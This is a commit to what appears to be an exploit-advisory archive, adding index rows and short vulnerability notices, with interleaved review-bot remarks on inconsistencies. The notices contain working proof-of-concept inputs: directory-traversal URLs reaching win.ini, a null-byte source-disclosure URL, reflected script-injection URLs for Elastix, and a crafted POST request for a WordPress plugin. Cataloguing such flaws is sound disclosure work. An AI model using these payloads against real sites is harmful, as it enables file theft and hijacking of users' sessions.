Updated 10_14_2014

Offensive Security 2014-10-14 04:50:20 +00:00
parent 60e5c6c2a0
commit 68d833b397
7 changed files with 122 additions and 0 deletions


@ -31462,3 +31462,9 @@ id,file,description,date,author,platform,type,port
34938,platforms/windows/dos/34938.txt,"Teamspeak 2.0.32.60 Memory Corruption Vulnerability",2010-10-28,"Jokaim and nSense",windows,dos,0
34939,platforms/php/webapps/34939.txt,"W-Agora 4.1.5 Local File Include and Cross Site Scripting Vulnerabilities",2010-10-27,MustLive,php,webapps,0
34940,platforms/php/webapps/34940.txt,"212cafe WebBoard 2.90 beta 'view.php' Directory Traversal Vulnerability",2009-05-29,MrDoug,php,webapps,0
34941,platforms/php/webapps/34941.txt,"Intergo Arcade Trade Script 1.0 'q' Parameter Cross Site Scripting Vulnerability",2009-05-25,SmOk3,php,webapps,0
34942,platforms/php/webapps/34942.txt,"Elastix 2.0.2 Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"dave b",php,webapps,0
34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 Directory Traversal Vulnerability",2010-11-01,"John Leitch",windows,remote,0
34944,platforms/php/webapps/34944.txt,"SmartOptimizer Null Character Remote Information Disclosure Vulnerability",2010-11-01,"Francois Harvey",php,webapps,0
34945,platforms/multiple/remote/34945.txt,"Home File Share Server 0.7.2 32 Directory Traversal Vulnerability",2010-11-01,"John Leitch",multiple,remote,0
34946,platforms/php/webapps/34946.txt,"cformsII 11.5/ 13.1 Plugin for WordPress 'lib_ajax.php' Multiple Cross Site Scripting Vulnerabilities",2010-11-01,"Wagner Elias",php,webapps,0
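
Review bot: the version strings in three of the new rows do not match the advisory files added in this same commit. Row 34945 reads "0.7.2 32" where the advisory text says "0.7.2.32", row 34943 reads "1.0.0" where the advisory text says "1.0.0.0", and row 34946 reads "11.5/ 13.1" (stray space after the slash) while the advisory text names only 13.1. Suggest normalising the description column against the file bodies so that a version search on the index finds these entries.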


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44580/info
Home File Share Server is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files within the context of the webserver. Information harvested may aid in launching further attacks.
Home File Share Server 0.7.2.32 is vulnerable; other versions may also be affected.
http://www.example.com/RealFolder/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F
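
Review bot: the sample URL on the last line uses the encoded form "..%2F", but the description only says input is not "sufficiently" sanitized. State whether the literal "../" form is rejected, since that tells a maintainer whether the path check runs before URL decoding and therefore where the fix belongs. The "RealFolder" segment also needs a sentence saying what it stands for.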


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44555/info
Arcade Trade Script is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Arcade Trade Script 1.0 beta is vulnerable; other versions may also be affected.
http://www.example.com/index.php?a=gamelist&q=[XSS]&submit=GO
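
Review bot: product name and version in this text disagree with index row 34941: here it is "Arcade Trade Script 1.0 beta", in the CSV it is "Intergo Arcade Trade Script 1.0". Use one form in both places. The description also never names the affected parameter; only the sample URL and the CSV title show that it is "q", so add that to the text.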

platforms/php/webapps/34942.txt Executable file

@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/44565/info
Elastix is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Elastix 2.0.2 is vulnerable; other versions may also be affected.
https://www.example.com/index.php?menu=packages&nombre_paquete=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&submitInstalado=installed&submit_nombre=Search
https://www.example.com/?menu=pbxconfig&display=recordings&Submit=Go&display=recordings&usersnum=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
https://www.example.com/index.php?menu=cdrreport&date_end=28%20Oct%202010&date_start=28%20Oct%202010&field_name=dst&field_pattern=%22%2F%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&filter=Filter&status=ALL
https://www.example.com/index.php?menu=asterisk_log&filter=2010-10-28&offset=0&busqueda=&ultima_busqueda=&ultimo_offset=&&busqueda=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E&filter=2010-10-28&offset=0&show=Show&ultima_busqueda=&ultimo_offset=
https://www.example.com/index.php?menu=summary_by_extension&option_fil=&value_fil=&date_from=28&date_from=28%20Oct%202010&date_to=28%20Oct%202010&option_fil=Ext&show=Show&value_fil=%22%2F%3E%3Cscript%3Ealert(1)%3B%3C%2Fscript%3E
https://www.example.com/index.php?menu=grouplist&action=view&id=1%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
https://www.example.com/index.php?menu=group_permission&filter_group=1&filter_resource=%22/%3E%3Cscript%3Ealert%281%29;%3C/script%3E
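
Review bot: several of the sample URLs repeat the same parameter, which hides which occurrence is the reflected one. "display=recordings" appears twice in the second URL; the "asterisk_log" URL repeats "busqueda", "filter", "offset", "ultima_busqueda" and "ultimo_offset" and contains an empty "&&"; the "summary_by_extension" URL repeats "date_from", "option_fil" and "value_fil". Suggest trimming each URL to one occurrence per parameter and listing the affected parameter for each menu page in the description ("nombre_paquete", "usersnum", "field_pattern", "busqueda", "value_fil", "id", "filter_resource"), so that whoever patches or writes filter rules does not have to decode seven URLs. The file is also added as executable although it is plain text.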


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44578/info
SmartOptimizer is prone to a remote information-disclosure vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability to view the source code of files in the context of the server process; this may aid in further attacks.
SmartOptimizer 1.7 is vulnerable; prior versions may also be affected.
http://www.example.com/smartoptimizer/index.php?../index.php%00.js
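
Review bot: the description does not mention the null character that the index title ("Null Character Remote Information Disclosure") and the "%00.js" suffix of the sample URL both point to. Add a sentence explaining the role of the encoded NUL before ".js", so the entry documents the cause and not only the effect. "Prior versions may also be affected" should be paired with the first fixed version if the source advisory gives one.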

platforms/php/webapps/34946.txt Executable file

@ -0,0 +1,59 @@
source: http://www.securityfocus.com/bid/44587/info
The cformsII plugin for WordPress is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
cformsII 13.1 is vulnerable; other versions may also be affected.
Request:
http://www.example.com/wp-content/plugins/cforms/lib_ajax.php
POST /wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Host: www.example.com
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:
1.9.2.10) Gecko/20100914 Firefox/3.6.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 219
Cookie: wp-settings-1=m0%3Do%26m1%3Do%26m2%3Do%26m3%3Do%26m4%3Do%26m5%3Do
%26m6%3Do%26m7%3Do%26m8%3Do%26urlbutton%3Dnone%26editor%3Dtinymce
%26imgsize%3Dfull%26align%3Dcenter%26hidetb%3D1%26m9%3Dc%26m10%3Do
%26uploader%3D1%26m11%3Do; wp-settings-time-1=1285758765;
c o m m e n t _ a u t h o r _ 9 3 f 4 1 b a 0 b 1 6 f 3 4 6 7 6 f 8 0 2 0 5 8 e 8 2 3 8 8 f 6 = t e s t ;
comment_author_email_93f41ba0b16f34676f802058e82388f6=rbranco_nospam
%40checkpoint.com
Pragma: no-cache
Cache-Control: no-cache
rs=<script>alert(1)</script>&rst=&rsrnd=1287506634854&rsargs[]=1$#
$<script>alert(1)</script>$#$rbranco_nospam@checkpoint.com$#$http://
www.checkpoint.com$#$<script>alert(1)</script>
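
Review bot: the captured request is hard-wrapped in the middle of header values and of the body, so it no longer parses as HTTP. The "User-Agent" value breaks after "rv:", the "Cookie" header is spread over seven lines with one cookie name written with a space between every character, there is no blank line between "Cache-Control: no-cache" and the body, and the body is split across three lines, which leaves "Content-Length: 219" uncheckable. Suggest restoring one header per line and naming the reflected fields ("rs" and the "rsargs[]" items) in the description. The cookie and body also carry an e-mail address and WordPress settings cookies that can be cut without losing anything the entry needs.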


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/44569/info
Project Jug is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to read files outside the webroot directory. Information harvested may aid in launching further attacks.
Project Jug 1.0.0.0 is vulnerable; other versions may also be affected.
http://www.example.com/.../.../.../.../.../.../.../.../.../.../windows/win.ini
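
Review bot: the sample URL on the last line uses three-dot segments (".../") rather than "../", and nothing in the description says whether that is intentional. Confirm it against the source advisory and add a sentence saying so, otherwise a later cleanup is likely to "correct" it to two dots and change what the entry documents.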